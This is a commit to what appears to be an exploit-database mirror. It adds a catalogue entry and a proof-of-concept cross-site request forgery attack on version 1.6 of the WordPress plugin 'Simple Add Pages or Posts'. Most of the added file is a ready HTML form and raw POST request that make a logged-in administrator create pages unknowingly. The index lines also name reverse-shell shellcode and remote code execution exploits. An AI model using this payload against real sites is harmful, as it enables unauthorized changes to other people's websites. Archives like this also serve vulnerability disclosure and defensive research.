DB: 2016-02-14

1 new exploits
2016-02-14 05:02:40 +00:00 · 2016-02-14 05:02:40 +00:00 · a9d446b65b
commit a9d446b65b
parent 0d39670c20
2 changed files with 43 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35627,6 +35627,7 @@ id,file,description,date,author,platform,type,port
 39381,platforms/osx/dos/39381.c,"OS X - IOHDIXControllerUserClient::convertClientBuffer Integer Overflow",2016-01-28,"Google Security Research",osx,dos,0
 39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
 39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39384,platforms/php/webapps/39384.txt,"WordPress Simple Add Pages or Posts Plugin 1.6 - CSRF Vulnerability",2016-01-29,ALIREZA_PROMIS,php,webapps,0
 39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
 39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
 39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
--- a/platforms/php/webapps/39384.txt
+++ b/platforms/php/webapps/39384.txt
@ -0,0 +1,42 @@
 ########################################################################
 # Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability
 # Date: 2016/29/01
 # Exploit Author: ALIREZA_PROMIS
 # Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/
 # Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip
 # Version: 1.6
 # Tested on: ubuntu / FireFox
 ########################################################################
 [Exploitation]
 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
 [HTML CODE ]
 <form id="form1" name="form1" method="post" action="http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php"
 <select name="postorpage">
 <option value="page">Page</option>
 <option value="post">Post</option>
 </select>
 <td colspan="2"><select name='post_parent' id='post_parent'>
 <option value="">No, do not use parent</option>
 <option class="level-0" value="2">Sample Page</option>
 </select>
 <tr class="alternate iedit">
 <textarea name="titles" rows="1" cols="30">&lt;/textarea&gt;
 <tr class="iedit">
 <td colspan="2"><select name="author_id">
 <option value="1">admin</option></select>
 <input type="submit" name="submitbutton" value="Add" class="button-primary"></form>
 and live POST request :
 postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add
 ########################################################################
 # Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r
 # Sajjad Sotoudeh , security  , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk
 #
 # [+] fb.com/alirezapomis.blackhat
 ########################################################################